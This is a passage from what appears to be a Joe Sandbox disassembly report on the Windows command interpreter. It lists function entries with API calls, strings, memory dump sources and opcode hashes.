                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ef1c464606ce296e425b6fa883cac455a23f1b0978f8503033b6499a7132fc86
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2c588a077fefa3390eb13d3a2b1d411f4a024e0650b234c2026cb057115f8277
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef1c464606ce296e425b6fa883cac455a23f1b0978f8503033b6499a7132fc86
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7ED0C972240305ABEB002BE5EC0DA4A3F28EB46353F004100F30DC2061CA3E44018B67
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00019458 Relevance: 42.3, APIs: 15, Strings: 9, Instructions: 328threadprocessstringCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,0003C9D0,00000108,00022107,?,00000000,00000000,00000000), ref: 000194AA
                                                                                                                                                                                                                                                                                                                                                                                                                          • UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 000194D9
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 000194F1
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0001954A
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 0001955D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021D90: _wcsnicmp.MSVCRT ref: 00021E14
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(00000000,\XCOPY.EXE), ref: 000195B8
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 00019602
                                                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00019624
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 0002BDF1
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 0002BE0D
                                                                                                                                                                                                                                                                                                                                                                                                                          • DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000000), ref: 0002BE26
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AttributeProcThread$ErrorLastListmemset$CloseCreateDeleteHandleInfoInitializeProcessStartupUpdate_wcsnicmplstrcmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $%01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$D$H$\XCOPY.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1449572041-3461277227
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a87a2b3e097c15c550e0740646047c33b8b818c03717a1a2b27f9981277d5ba5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f6b1406babd7ab950e4b249626a42d9306312264f0a30951a59db6ae39ffe48d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a87a2b3e097c15c550e0740646047c33b8b818c03717a1a2b27f9981277d5ba5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EC1A174A043259FEB649B64DC55BEE77B8EF46304F0040AAE60AD7181EB748DC0CF62
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00014710 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 435fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00014781
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 000147E4
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001), ref: 000147EC
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 000147FD
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00014805
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A16C: _close.MSVCRT ref: 0001A19B
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00014832
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001), ref: 0001483A
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00014871
                                                                                                                                                                                                                                                                                                                                                                                                                          • SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,?,?,00000000,?,-00000001), ref: 00028120
                                                                                                                                                                                                                                                                                                                                                                                                                          • memmove.MSVCRT(?,?,?), ref: 00028191
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,00000000,?,00000000), ref: 00028328
                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0002832F
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DD98: _get_osfhandle.MSVCRT ref: 0001DDA3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0002C050), ref: 0001DDAD
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File_get_osfhandle$memset$ConsoleHandlePathPointerReadSearchSizeTypeWrite_closememmove
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: DPATH
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2545859659-2010427443
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 52bb4a980374ba8e172b8469dfd59fffec2eb0e858bf0b15580dedf2f119333a
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: fea144b7837d412295f5303dde5d9b29d8d220c0e734c17778302156f97c070a
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52bb4a980374ba8e172b8469dfd59fffec2eb0e858bf0b15580dedf2f119333a
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0AF1CE75609351DFE724CF24D844BAFB7E8BB88710F108A2EF88997290DB74D945CB92
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001E0B0 Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 308COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmp$iswspace
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: =,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 759518647-875390083
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f3b38f7908ca2fe432fee23fb6ed42eeb441bd3221a4932226546307ac0d80f4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4ad81d82b361838ecf03512779322591643492c55ba9a2c3c9f166591a938ce7
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3b38f7908ca2fe432fee23fb6ed42eeb441bd3221a4932226546307ac0d80f4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1A10834244322A6EB7867A4BC0ABFF32A4AB85715F14443EF5028A4D1DFB888C5C757
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001CF10 Relevance: 33.7, APIs: 15, Strings: 4, Instructions: 446COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: iswdigit$iswspacewcschr$_setjmp3
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: ()|&=,;"$=,;$@$Ungetting: '%s'
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 684130364-3872429996
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ab34af1d2fcf7476111274fbe7171c77e82c5d554457b2d4448034bdf511addc
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8dc2224423d724b3bcedaaa721bc526f4d9320f54255181af0b7b024005a0733
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab34af1d2fcf7476111274fbe7171c77e82c5d554457b2d4448034bdf511addc
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5EE112B5A00221ABEB708F68D8857FE77E0AF56345F244027EC45D7291E339CEC19B56
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001EC2E Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 139COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,0003E590,00002000,?,00058BF0,00000000,?,?,00018F0D), ref: 0001EC51
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0001EC77
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0001EC8D
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0001ECA3
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0001ECB9
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0001ECCF
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0001ECE5
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0001ECF7
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0001ED0D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019310: GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,0003E590,?,00002000), ref: 00019342
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019310: SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00019356
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019310: FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 0001936A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019310: FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 0001937E
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmp$Time$File$System$EnvironmentLocalVariable
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2447294730-2301591722
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 57449d0244240244d3841955ebbb0467d0766efe14c597e7c302f9d6d9d4f152
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ba313a9730c3c48610474ff1c75684e88a3488183f75ff075a9bd4fbc7042617
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57449d0244240244d3841955ebbb0467d0766efe14c597e7c302f9d6d9d4f152
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9310832308742ABB7141770FC0EBFF279DEF8A325B184519F902D00D1EF689991866B
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00039C2E Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 250COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsupr.MSVCRT ref: 00039CC8
                                                                                                                                                                                                                                                                                                                                                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000,?), ref: 00039D22
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00039D2A
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00039D3A
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00039D50
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00039D58
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00039D68
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00039D7C
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00039DDB
                                                                                                                                                                                                                                                                                                                                                                                                                          • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00039DE2
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,00000001,?), ref: 00039DF2
                                                                                                                                                                                                                                                                                                                                                                                                                          • towupper.MSVCRT ref: 00039E13
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A16C: _close.MSVCRT ref: 0001A19B
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00039E6A
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00039E9B
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00039EA9
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DD98: _get_osfhandle.MSVCRT ref: 0001DDA3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0002C050), ref: 0001DDAD
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_close_get_osfhandle_wcsuprtowupperwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: <noalias>$CMD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2015057810-1690691951
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ddfd4a0f11c34505abcd57912bb9e175e727858352d7aac667bd829ed18df2b7
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: aa51caad104660a4c8745d8d814a698c37aee412ba5141839ab33bf2981c63f3
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ddfd4a0f11c34505abcd57912bb9e175e727858352d7aac667bd829ed18df2b7
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04811672A002149BDF16DBB4EC45AEEBBFDAF46710F140129F802E7290EBB59D41CB65
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001790C Relevance: 28.7, APIs: 19, Instructions: 208COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: _get_osfhandle.MSVCRT ref: 00019A1C
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0001793A,00000104,?), ref: 00019A2B
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374,-00000001), ref: 00019A47
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374), ref: 00019A56
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374), ref: 00019A61
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374,-00000001), ref: 00019A6A
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00017943
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374,-00000001), ref: 00017951
                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00050AF0,000000A0,00000000,00000000,00000000,?,00000104,?), ref: 000179BE
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,00000104,?), ref: 00017A1C
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00017A27
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$ErrorLastLockShared_get_osfhandle$AcquireBufferFileHandleInfoModeReleaseScreenTypeWrite
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2173784998-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 0e112aff63e0475de1986287f4df36c4d83ea2b473d146cd32a31899dd69bd52
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d76b0de5c8bb2a54d825f456979d5f1ff668f4e176b2ef8865b7645cbaf8bab6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e112aff63e0475de1986287f4df36c4d83ea2b473d146cd32a31899dd69bd52
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D716071A00215DFDB14DFA4EC88AAFBBF9FF45312F10452AF906E6150DB389984CB51
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00032859 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 165windowthreadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000,?,?,?), ref: 00032931
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00032998
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
